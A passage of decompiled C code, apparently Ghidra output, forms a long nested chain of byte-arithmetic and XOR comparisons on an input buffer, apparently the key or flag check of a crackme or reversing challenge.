                                                                   ) {
                                                                  uVar1 = 1;
                                                                }
                                                                else {
                                                                  if ((int)(char)param_1[0x2e] +
                                                                      (int)(char)param_1[0x29] ==
                                                                      0x6d) {
                                                                    uVar1 = 1;
                                                                  }
                                                                  else {
                                                                    if ((int)(char)param_1[0x28] +
                                                                        (int)(char)param_1[0x29] ==
                                                                        0xab) {
                                                                      if ((int)(char)param_1[0x28] +
                                                                          (int)(char)param_1[0x2a]
                                                                          == 0xde) {
                                                                        uVar1 = 1;
                                                                      }
                                                                      else {
                                                                        if ((int)(char)param_1[0x2a]
                                                                            - (int)(char)param_1[
                                                  0x2e] == 0x3c) {
                                                    uVar1 = 1;
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x2a] -
                                                        (int)(char)param_1[0xd] == 0x38) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[0x29] ^ param_1[0x2a]) == 0x50) {
                                                        if ((param_1[0x30] ^ param_1[0x2b]) == 0x1c)
                                                        {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          if ((param_1[4] ^ param_1[0x2b]) == 8) {
                                                            uVar1 = 1;
                                                          }
                                                          else {
                                                            if ((int)(char)param_1[0x2b] -
                                                                (int)(char)param_1[0x30] == 0x1a) {
                                                              uVar1 = 1;
                                                            }
                                                            else {
                                                              if ((int)(char)param_1[0x2b] -
                                                                  (int)(char)param_1[0x2a] == 0x12)
                                                              {
                                                                if ((int)(char)param_1[0x2c] -
                                                                    (int)(char)param_1[0x1b] ==
                                                                    -0x37) {
                                                                  uVar1 = 1;
                                                                }
                                                                else {
                                                                  if ((int)(char)param_1[0x31] +
                                                                      (int)(char)param_1[0x2c] ==
                                                                      0x73) {
                                                                    uVar1 = 1;
                                                                  }
                                                                  else {
                                                                    if ((int)(char)param_1[0x1f] +
                                                                        (int)(char)param_1[0x2c] ==
                                                                        0xb2) {
                                                                      uVar1 = 1;
                                                                    }
                                                                    else {
                                                                      if ((param_1[0x2b] ^
                                                                          param_1[0x2c]) == 0x42) {
                                                                        if ((int)(char)param_1[0x2d]
                                                                            - (int)(char)param_1[10]
                                                                            == 4) {
                                                                          uVar1 = 1;
                                                                        }
                                                                        else {
                                                                          if ((int)(char)param_1[
                                                  0x2d] - (int)(char)param_1[0x2b] == -0x42) {
                                                    uVar1 = 1;
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x3f] +
                                                        (int)(char)param_1[0x2d] == 0x3d) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[0x2c] ^ param_1[0x2d]) == 6) {
                                                        if ((int)(char)param_1[0x16] +
                                                            (int)(char)param_1[0x2e] == 0x67) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          if ((param_1[0x2d] ^ param_1[0x2e]) == 1)
                                                          {
                                                            if ((param_1[0x31] ^ param_1[0x2f]) ==
                                                                0x56) {
                                                              uVar1 = 1;
                                                            }
                                                            else {
                                                              if ((int)(char)param_1[0x2f] -
                                                                  (int)(char)param_1[5] == 0x44) {
                                                                uVar1 = 1;
                                                              }
                                                              else {
                                                                if ((int)(char)param_1[0x2b] +
                                                                    (int)(char)param_1[0x2f] == 0xed
                                                                   ) {
                                                                  uVar1 = 1;
                                                                }
                                                                else {
                                                                  if ((int)(char)param_1[0x2e] +
                                                                      (int)(char)param_1[0x2f] ==
                                                                      0x9e) {
                                                                    if ((param_1[0x23] ^
                                                                        param_1[0x30]) == 0x30) {
                                                                      uVar1 = 1;
                                                                    }
                                                                    else {
                                                                      if ((int)(char)param_1[0xb] +
                                                                          (int)(char)param_1[0x30]
                                                                          == 0x9b) {
                                                                        uVar1 = 1;
                                                                      }
                                                                      else {
                                                                        if ((param_1[0x2f] ^
                                                                            param_1[0x30]) == 0x31)
                                                                        {
                                                                          if ((int)(char)param_1[
                                                  0x17] + (int)(char)param_1[0x31] == 0xb2) {
                                                    uVar1 = 1;
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x13] +
                                                        (int)(char)param_1[0x31] == 0xa7) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x31] -
                                                          (int)(char)param_1[0x1c] == 6) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0x30] ^ param_1[0x31]) == 0x6b)
                                                        {
                                                          if ((int)(char)param_1[9] +
                                                              (int)(char)param_1[0x32] == 0xce) {
                                                            uVar1 = 1;
                                                          }
                                                          else {
                                                            if ((int)(char)param_1[0x32] -
                                                                (int)(char)param_1[8] == 4) {
                                                              uVar1 = 1;
                                                            }
                                                            else {
                                                              if ((int)(char)param_1[0x32] -
                                                                  (int)(char)param_1[0x16] == 0x48)
                                                              {
                                                                uVar1 = 1;
                                                              }
                                                              else {
                                                                if ((int)(char)param_1[0x32] -
                                                                    (int)(char)param_1[0x31] == 0x3a
                                                                   ) {
                                                                  if ((param_1[0x3c] ^ param_1[0x33]
                                                                      ) == 0xd) {
                                                                    uVar1 = 1;
                                                                  }
                                                                  else {
                                                                    if ((param_1[0x11] ^
                                                                        param_1[0x33]) == 0x42) {
                                                                      uVar1 = 1;
                                                                    }
                                                                    else {
                                                                      if ((param_1[0xc] ^
                                                                          param_1[0x33]) == 0x55) {
                                                                        uVar1 = 1;
                                                                      }
                                                                      else {
                                                                        if ((int)(char)param_1[0x33]
                                                                            - (int)(char)param_1[
                                                  0x32] == -0x3a) {
                                                    if ((int)(char)param_1[0x1c] +
                                                        (int)(char)param_1[0x34] == 0xa4) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x34] -
                                                          (int)(char)param_1[0xb] == 0x39) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0x2d] ^ param_1[0x34]) == 0x5f)
                                                        {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          if ((int)(char)param_1[0x33] +
                                                              (int)(char)param_1[0x34] == 0xa0) {
                                                            if ((int)(char)param_1[0x35] -
                                                                (int)(char)param_1[0x13] == 0x11) {
                                                              uVar1 = 1;
                                                            }
                                                            else {
                                                              if ((param_1[0x14] ^ param_1[0x35]) ==
                                                                  0x1a) {
                                                                uVar1 = 1;
                                                              }
                                                              else {
                                                                if ((int)(char)param_1[0x35] -
                                                                    (int)(char)param_1[0x1b] == 6) {
                                                                  uVar1 = 1;
                                                                }
                                                                else {
                                                                  if ((int)(char)param_1[0x35] -
                                                                      (int)(char)param_1[0x34] ==
                                                                      0xd) {
                                                                    if (param_1[0x36] == param_1[5])
                                                                    {
                                                                      uVar1 = 1;
                                                                    }
                                                                    else {
                                                                      if ((param_1[0x12] ^
                                                                          param_1[0x36]) == 2) {
                                                                        uVar1 = 1;
                                                                      }
                                                                      else {
                                                                        if ((param_1[0x35] ^
                                                                            param_1[0x36]) == 0x4c)
                                                                        {
                                                                          if ((int)(char)param_1[
                                                  0x3c] + (int)(char)param_1[0x37] == 0x6a) {
                                                    uVar1 = 1;
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x27] +
                                                        (int)(char)param_1[0x37] == 0x6e) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x37] -
                                                          (int)(char)param_1[4] == -0x46) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x37] -
                                                            (int)(char)param_1[0x36] == -4) {
                                                          if ((int)(char)param_1[0x38] -
                                                              (int)(char)param_1[0x33] == 0xb) {
                                                            uVar1 = 1;
                                                          }
                                                          else {
                                                            if ((param_1[2] ^ param_1[0x38]) == 0x7d
                                                               ) {
                                                              uVar1 = 1;
                                                            }
                                                            else {
                                                              if ((int)(char)param_1[0x38] -
                                                                  (int)(char)param_1[0x2e] == 8) {
                                                                uVar1 = 1;
                                                              }
                                                              else {
                                                                if ((int)(char)param_1[0x37] +
                                                                    (int)(char)param_1[0x38] == 0x66
                                                                   ) {
                                                                  if ((param_1[0x2f] ^ param_1[0x39]
                                                                      ) == 0x27) {
                                                                    uVar1 = 1;
                                                                  }
                                                                  else {
                                                                    if ((int)(char)param_1[0x39] -
                                                                        (int)(char)param_1[0x3c] ==
                                                                        0x36) {
                                                                      uVar1 = 1;
                                                                    }
                                                                    else {
                                                                      if ((int)(char)param_1[0x34] +
                                                                          (int)(char)param_1[0x39]
                                                                          == 0xd3) {
                                                                        uVar1 = 1;
                                                                      }
                                                                      else {
                                                                        if ((int)(char)param_1[0x38]
                                                                            + (int)(char)param_1[
                                                  0x39] == 0x94) {
                                                    if ((param_1[0x12] ^ param_1[0x3a]) == 10) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x3a] -
                                                          (int)(char)param_1[9] == -0x26) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x11] +
                                                            (int)(char)param_1[0x3a] == 0xa9) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          if ((int)(char)param_1[0x3a] -
                                                              (int)(char)param_1[0x39] == -0x28) {
                                                            if ((int)(char)param_1[0x3b] -
                                                                (int)(char)param_1[0x2a] == -0x29) {
                                                              uVar1 = 1;
                                                            }
                                                            else {
                                                              if ((int)(char)param_1[0x3c] +
                                                                  (int)(char)param_1[0x3b] == 0x66)
                                                              {
                                                                uVar1 = 1;
                                                              }
                                                              else {
                                                                if ((param_1[0x2f] ^ param_1[0x3b])
                                                                    == 0x48) {
                                                                  uVar1 = 1;
                                                                }
                                                                else {
                                                                  if ((int)(char)param_1[0x3b] -
                                                                      (int)(char)param_1[0x3a] == -7
                                                                     ) {
                                                                    if ((param_1[0x11] ^
                                                                        param_1[0x3c]) == 0x4a) {
                                                                      uVar1 = 1;
                                                                    }
                                                                    else {
                                                                      if ((int)(char)param_1[0x33] +
                                                                          (int)(char)param_1[0x3c]
                                                                          == 0x65) {
                                                                        uVar1 = 1;
                                                                      }
                                                                      else {
                                                                        if ((param_1[0xe] ^
                                                                            param_1[0x3c]) == 0x59)
                                                                        {
                                                                          uVar1 = 1;
                                                                        }
                                                                        else {
                                                                          if (param_1[0x3c] ==
                                                                              param_1[0x3b]) {
                                                                            if ((int)(char)param_1[
                                                  0x3d] - (int)(char)param_1[0x3f] == 0x6a) {
                                                    uVar1 = 1;
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x1a] +
                                                        (int)(char)param_1[0x3d] == 0xd6) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[0x15] ^ param_1[0x3d]) == 0x19) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x3c] +
                                                            (int)(char)param_1[0x3d] == 0x9c) {
                                                          if ((int)(char)param_1[0x3e] -
                                                              (int)(char)param_1[5] == 0x50) {
                                                            uVar1 = 1;
                                                          }
                                                          else {
                                                            if ((int)(char)param_1[0x19] +
                                                                (int)(char)param_1[0x3e] == 0xf7) {
                                                              uVar1 = 1;
                                                            }
                                                            else {
                                                              if ((int)(char)param_1[0x31] +
                                                                  (int)(char)param_1[0x3e] == 0xba)
                                                              {
                                                                uVar1 = 1;
                                                              }
                                                              else {
                                                                if ((int)(char)param_1[0x3e] -
                                                                    (int)(char)param_1[0x3d] == 0x11
                                                                   ) {
                                                                  if ((param_1[0x2b] ^ param_1[0x3f]
                                                                      ) == 0x75) {
                                                                    uVar1 = 1;
                                                                  }
                                                                  else {
                                                                    if ((int)(char)param_1[0x10] +
                                                                        (int)(char)param_1[0x3f] ==
                                                                        0x85) {
                                                                      uVar1 = 1;
                                                                    }
                                                                    else {
                                                                      if ((int)(char)param_1[6] +
                                                                          (int)(char)param_1[0x3f]
                                                                          == 0x80) {
                                                                        uVar1 = 1;
                                                                      }
                                                                      else {
                                                                        if ((int)(char)param_1[0x3e]
                                                                            + (int)(char)param_1[
                                                  0x3f] == 0x87) {
                                                    uVar1 = 0;
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x3f] -
                                                        (int)(char)param_1[9] == -0x4f) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[0x21] ^ param_1[0x3f]) == 0x6e) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x3f] -
                                                            (int)(char)param_1[0x26] == -0x52) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[0x13] ^ param_1[0x3e]) == 6) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[0x36] ^ param_1[0x3e]) == 0x4a) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x3b] +
                                                            (int)(char)param_1[0x3e] == 0xb1) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x3d] -
                                                        (int)(char)param_1[0xe] == 0x16) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[0x35] ^ param_1[0x3d]) == 0x13) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0x36] ^ param_1[0x3d]) == 0x52)
                                                        {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x1b] +
                                                        (int)(char)param_1[0x3c] == 0xa9) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x3c] -
                                                          (int)(char)param_1[0x3b] == 5) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x3c] -
                                                            (int)(char)param_1[0x34] == -0x37) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[7] ^ param_1[0x3b]) == 0xb) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[1] ^ param_1[0x3b]) == 100) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0x2c] ^ param_1[0x3b]) == 0xf)
                                                        {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x29] +
                                                        (int)(char)param_1[0x3a] == 0x70) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x3a] -
                                                          (int)(char)param_1[0x15] == -0x2f) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0x32] ^ param_1[0x3a]) == 0x45)
                                                        {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[0x25] ^ param_1[0x39]) == 0x33) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x30] +
                                                          (int)(char)param_1[0x39] == 0xc6) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x38] +
                                                            (int)(char)param_1[0x39] == 0x9e) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x20] +
                                                        (int)(char)param_1[0x38] == 0xa3) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[6] ^ param_1[0x38]) == 0x40) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x26] +
                                                            (int)(char)param_1[0x38] == 0x9b) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x37] -
                                                        (int)(char)param_1[0x2c] == 1) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0xc] +
                                                          (int)(char)param_1[0x37] == 0x94) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0x29] ^ param_1[0x37]) == 0xd)
                                                        {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[0x35] ^ param_1[0x36]) == 0x4e) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x36] -
                                                          (int)(char)param_1[0x22] == 0xd) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if (param_1[0x36] == param_1[0x3a]) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x35] -
                                                        (int)(char)param_1[0xe] == 0x1d) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x1e] +
                                                          (int)(char)param_1[0x35] == 0xb4) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x35] -
                                                            (int)(char)param_1[0xb] == 0x49) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x26] +
                                                        (int)(char)param_1[0x34] == 0xcd) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x37] +
                                                          (int)(char)param_1[0x34] == 0xa3) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x1b] +
                                                            (int)(char)param_1[0x34] == 0xe6) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[1] ^ param_1[0x33]) == 0x60) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x33] -
                                                          (int)(char)param_1[0x20] == -0x32) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        uVar1 = 1;
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x32] -
                                                        (int)(char)param_1[0xb] == 0x3d) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[3] +
                                                          (int)(char)param_1[0x32] == 0xba) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0x28] ^ param_1[0x32]) == 0x11)
                                                        {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[10] ^ param_1[0x31]) == 0xe) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x23] +
                                                          (int)(char)param_1[0x31] == 0xa2) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[7] +
                                                            (int)(char)param_1[0x31] == 0x6d) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x2d] +
                                                        (int)(char)param_1[0x30] == 0x99) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x31] +
                                                          (int)(char)param_1[0x30] == 0x98) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x13] +
                                                            (int)(char)param_1[0x30] == 0xd8) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x26] +
                                                        (int)(char)param_1[0x2f] == 0xd1) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[9] ^ param_1[0x2f]) == 0xd) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        uVar1 = 1;
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[0x20] ^ param_1[0x2e]) == 0x40) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0xd] +
                                                          (int)(char)param_1[0x2e] == 0x6c) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0x2f] ^ param_1[0x2e]) == 0x45)
                                                        {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[0x1a] ^ param_1[0x2d]) == 0x5e) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x1d] +
                                                          (int)(char)param_1[0x2d] == 0x95) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x2d] -
                                                            (int)(char)param_1[0x3a] == 1) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[0xe] ^ param_1[0x2c]) == 0x50) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[0x16] ^ param_1[0x2c]) == 5) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x30] +
                                                            (int)(char)param_1[0x2c] == 0x9d) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x37] +
                                                        (int)(char)param_1[0x2b] == 0xac) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x11] +
                                                          (int)(char)param_1[0x2b] == 0xed) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x2b] -
                                                            (int)(char)param_1[0x2d] == 0x4d) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[2] ^ param_1[0x2a]) == 0x2b) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[0x3f] ^ param_1[0x2a]) == 0x6e) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x2a] -
                                                            (int)(char)param_1[0x27] == 0x36) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x38] +
                                                        (int)(char)param_1[0x29] == 0x6c) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x27] +
                                                          (int)(char)param_1[0x29] == 0x69) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x29] -
                                                            (int)(char)param_1[0x10] == -0x3d) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[0x2e] ^ param_1[0x28]) == 0x4d) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[0x37] ^ param_1[0x28]) == 0x43) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0x12] ^ param_1[0x28]) == 0x42)
                                                        {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[0x12] ^ param_1[0x27]) == 0xb) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x34] +
                                                          (int)(char)param_1[0x27] == 0xa7) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x2a] +
                                                            (int)(char)param_1[0x27] == 0x98) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x26] -
                                                        (int)(char)param_1[0x22] == 0x38) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x26] -
                                                          (int)(char)param_1[0x1f] == -0x19) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x26] -
                                                            (int)(char)param_1[0x2b] == -0x14) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[6] +
                                                        (int)(char)param_1[0x25] == 0xd9) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      uVar1 = 1;
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x15] +
                                                        (int)(char)param_1[0x24] == 0xa2) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x24] -
                                                          (int)(char)param_1[0x1a] == -0x2e) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[9] +
                                                            (int)(char)param_1[0x24] == 0x9a) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[0x2b] ^ param_1[0x23]) == 0x17) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[0x36] ^ param_1[0x23]) == 0x50) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x23] -
                                                            (int)(char)param_1[0x30] == 0x17) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x22] -
                                                        (int)(char)param_1[0x30] == -0x26) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[0x3b] ^ param_1[0x22]) == 3) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0x19] ^ param_1[0x22]) == 0x48)
                                                        {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x11] +
                                                        (int)(char)param_1[0x21] == 0xdc) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x15] +
                                                          (int)(char)param_1[0x21] == 0xd7) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x17] +
                                                            (int)(char)param_1[0x21] == 0xe0) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[0x31] ^ param_1[0x20]) == 0x53) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x17] +
                                                          (int)(char)param_1[0x20] == 0xea) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0xd] ^ param_1[0x20]) == 0x55)
                                                        {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[0x32] ^ param_1[0x1f]) == 0xe) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x28] +
                                                          (int)(char)param_1[0x1f] == 0xf8) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x21] +
                                                            (int)(char)param_1[0x1f] == 0xe1) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
